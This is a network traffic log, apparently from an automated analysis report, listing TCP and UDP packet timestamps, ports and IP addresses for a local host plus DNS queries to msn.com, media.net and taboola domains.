Jan 21, 2021 08:14:34.184546947 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.185630083 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.185651064 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.185704947 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.185748100 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.186897993 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.186919928 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.186969995 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.188088894 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.188121080 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.188148975 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.188169003 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.189440012 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.189467907 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.189512014 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.189528942 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.196527958 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.196552992 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.196656942 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.196969032 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.196994066 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.197031975 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.197052956 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.208910942 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.208937883 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.208990097 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.209012032 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.209347963 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.209366083 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.209405899 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.209423065 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.210385084 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.210405111 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.210459948 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.210478067 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.211312056 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.211335897 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.211384058 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.211400986 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.212230921 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.212249041 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.212287903 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.212311983 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.213197947 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.213222980 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.213244915 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.213262081 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.213263035 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.213279009 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.213295937 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.214103937 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.214127064 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.214180946 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.214240074 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.215049028 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.215071917 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.215121031 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.215156078 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.215987921 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.216006041 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.216053963 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.216909885 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.216933012 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.216983080 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.217014074 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.217849970 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.217875004 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.217928886 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.218766928 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.218823910 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.218877077 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.218903065 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.219151020 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.219683886 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.219701052 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.219748974 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.219763994 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.220628023 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.220648050 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.220705986 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.221544981 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.221566916 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.221633911 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.221677065 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.222573042 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.222623110 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.222626925 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.222661018 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.223408937 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.223429918 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.223447084 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.223462105 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.223469019 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.223514080 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.224344969 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.224365950 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.224400043 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.224435091 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.225275040 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.225292921 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.225327969 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.225358009 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.226006031 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.226196051 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.226212025 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.226253986 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.226272106 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.227138996 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.227159977 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.227196932 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.227225065 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.228013992 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.228032112 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.228075981 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.228907108 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.228938103 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.228971004 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.229007006 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.229808092 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.229830980 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.229893923 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.230639935 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.230663061 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.230721951 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.230776072 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.230885029 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.231470108 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.231487989 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.231539011 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.232276917 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.232295036 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.232345104 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.232975960 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.233088970 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.233104944 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.233150959 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.233184099 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.233453989 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.233891964 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.233908892 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.233939886 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.233993053 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.233994007 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.234021902 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.234052896 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.234688997 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.234709978 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.234746933 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.234760046 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.235516071 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.235568047 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:15:16.151772022 CET	49788	80	192.168.2.4	143.204.214.141
Jan 21, 2021 08:15:16.152043104 CET	49789	80	192.168.2.4	143.204.214.141
Jan 21, 2021 08:15:16.191962957 CET	80	49788	143.204.214.141	192.168.2.4
Jan 21, 2021 08:15:16.191999912 CET	80	49789	143.204.214.141	192.168.2.4
Jan 21, 2021 08:15:16.192086935 CET	49788	80	192.168.2.4	143.204.214.141
Jan 21, 2021 08:15:16.192222118 CET	49789	80	192.168.2.4	143.204.214.141
Jan 21, 2021 08:15:16.193494081 CET	49788	80	192.168.2.4	143.204.214.141
Jan 21, 2021 08:15:16.233525038 CET	80	49788	143.204.214.141	192.168.2.4
Jan 21, 2021 08:15:16.278783083 CET	80	49788	143.204.214.141	192.168.2.4
Jan 21, 2021 08:15:16.281455040 CET	49788	80	192.168.2.4	143.204.214.141
Jan 21, 2021 08:15:46.232592106 CET	80	49789	143.204.214.141	192.168.2.4
Jan 21, 2021 08:15:46.232718945 CET	49789	80	192.168.2.4	143.204.214.141
Jan 21, 2021 08:16:15.932970047 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.933103085 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.933218956 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.933326960 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.933422089 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.933517933 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.975681067 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975708961 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975718021 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975724936 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975801945 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975889921 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975903034 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975913048 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975924969 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975959063 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975971937 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.975992918 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.975999117 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:16:15.976018906 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976022005 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976044893 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976053953 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976144075 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976175070 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976191998 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976205111 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976213932 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976221085 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:16:15.976226091 CET	49750	443	192.168.2.4	151.101.1.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 21, 2021 08:14:25.096849918 CET	62389	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:25.156975031 CET	53	62389	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:26.202327967 CET	49910	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:26.258462906 CET	53	49910	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:26.498450994 CET	55854	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:26.546389103 CET	53	55854	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:27.000596046 CET	64549	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:27.014178991 CET	63153	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:27.068866014 CET	53	64549	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:27.072069883 CET	53	63153	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:28.842861891 CET	52991	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:28.915817022 CET	53	52991	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:29.321054935 CET	53700	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:29.385031939 CET	53	53700	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:30.439054966 CET	51726	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:30.503048897 CET	53	51726	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:31.580324888 CET	56794	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:31.647097111 CET	53	56794	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:32.308625937 CET	56534	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:32.367578983 CET	53	56534	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:32.732023001 CET	56627	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:32.782668114 CET	53	56627	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:33.880481958 CET	56621	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:33.940999985 CET	53	56621	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:35.090768099 CET	63116	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:35.147173882 CET	53	63116	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:35.977009058 CET	64078	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:36.038223982 CET	53	64078	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:38.167355061 CET	64801	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:38.216900110 CET	53	64801	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:39.129591942 CET	61721	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:39.193397999 CET	53	61721	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:46.248780012 CET	51255	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:46.300183058 CET	53	51255	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:50.130152941 CET	61522	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:50.190599918 CET	53	61522	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:53.332688093 CET	52337	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:53.391309023 CET	53	52337	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:55.066175938 CET	55046	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:55.114130974 CET	53	55046	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:55.892350912 CET	49612	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:55.940160036 CET	53	49612	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:56.055958986 CET	55046	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:56.103965044 CET	53	55046	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:56.925966978 CET	49612	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:56.973866940 CET	53	49612	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:57.089999914 CET	55046	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:57.137923002 CET	53	55046	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:57.985174894 CET	49612	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:58.032980919 CET	53	49612	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:59.095532894 CET	55046	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:14:59.143455982 CET	53	55046	8.8.8.8	192.168.2.4
Jan 21, 2021 08:14:59.988323927 CET	49612	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:00.036209106 CET	53	49612	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:00.497987986 CET	49285	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:00.545947075 CET	53	49285	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:01.461321115 CET	50601	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:01.530203104 CET	53	50601	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:02.597404957 CET	60875	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:02.657099009 CET	53	60875	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:03.112977982 CET	55046	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:03.163184881 CET	53	55046	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:03.539369106 CET	56448	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:03.587265968 CET	53	56448	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:03.994716883 CET	49612	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:04.042700052 CET	53	49612	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:04.480217934 CET	59172	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:04.531064034 CET	53	59172	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:05.456173897 CET	62420	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:05.506125927 CET	53	62420	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:06.424381018 CET	60579	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:06.472364902 CET	53	60579	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:07.449837923 CET	50183	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:07.506592989 CET	53	50183	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:09.445758104 CET	61531	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:09.504888058 CET	53	61531	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:10.009686947 CET	49228	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:10.025814056 CET	59794	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:10.060740948 CET	53	49228	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:10.082061052 CET	53	59794	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:10.756930113 CET	55916	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:10.804933071 CET	53	55916	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:10.969244957 CET	52752	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:11.020035982 CET	53	52752	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:11.230973959 CET	60542	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:11.290388107 CET	53	60542	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:11.768753052 CET	60689	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:11.825444937 CET	53	60689	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:11.939827919 CET	64206	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:11.996244907 CET	53	64206	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:12.296241045 CET	50904	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:12.367193937 CET	53	50904	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:12.375907898 CET	57525	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:12.432614088 CET	53	57525	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:13.021946907 CET	53814	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:13.078337908 CET	53	53814	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:13.081348896 CET	53418	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:13.129142046 CET	53	53418	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:14.272901058 CET	62833	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:14.329456091 CET	53	62833	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:15.691915989 CET	59260	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:15.751216888 CET	53	59260	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:16.011053085 CET	49944	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:16.077627897 CET	53	49944	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:16.081836939 CET	63300	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:16.141247034 CET	53	63300	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:16.245980978 CET	61449	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:16.293678999 CET	53	61449	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:17.355237961 CET	51275	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:17.403300047 CET	53	51275	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:25.927130938 CET	63492	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:25.987284899 CET	53	63492	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:45.637233973 CET	58945	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:45.685276031 CET	53	58945	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:46.627229929 CET	58945	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:46.675134897 CET	53	58945	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:47.643321991 CET	58945	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:47.691309929 CET	53	58945	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:49.652534008 CET	58945	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:49.700584888 CET	53	58945	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:53.662463903 CET	58945	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:53.710645914 CET	53	58945	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:56.035202980 CET	60779	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:56.082901955 CET	53	60779	8.8.8.8	192.168.2.4
Jan 21, 2021 08:15:58.329446077 CET	64014	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:15:58.396421909 CET	53	64014	8.8.8.8	192.168.2.4
Jan 21, 2021 08:16:06.167211056 CET	57091	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:16:06.215176105 CET	53	57091	8.8.8.8	192.168.2.4
Jan 21, 2021 08:16:06.769709110 CET	55904	53	192.168.2.4	8.8.8.8
Jan 21, 2021 08:16:06.820581913 CET	53	55904	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 21, 2021 08:14:26.498450994 CET	192.168.2.4	8.8.8.8	0x16a3	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:28.842861891 CET	192.168.2.4	8.8.8.8	0x3b09	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:29.321054935 CET	192.168.2.4	8.8.8.8	0xdd9	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:30.439054966 CET	192.168.2.4	8.8.8.8	0x69cf	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:31.580324888 CET	192.168.2.4	8.8.8.8	0x6fd4	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:32.308625937 CET	192.168.2.4	8.8.8.8	0x3852	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:32.732023001 CET	192.168.2.4	8.8.8.8	0x1ee1	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:33.880481958 CET	192.168.2.4	8.8.8.8	0xe5b4	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
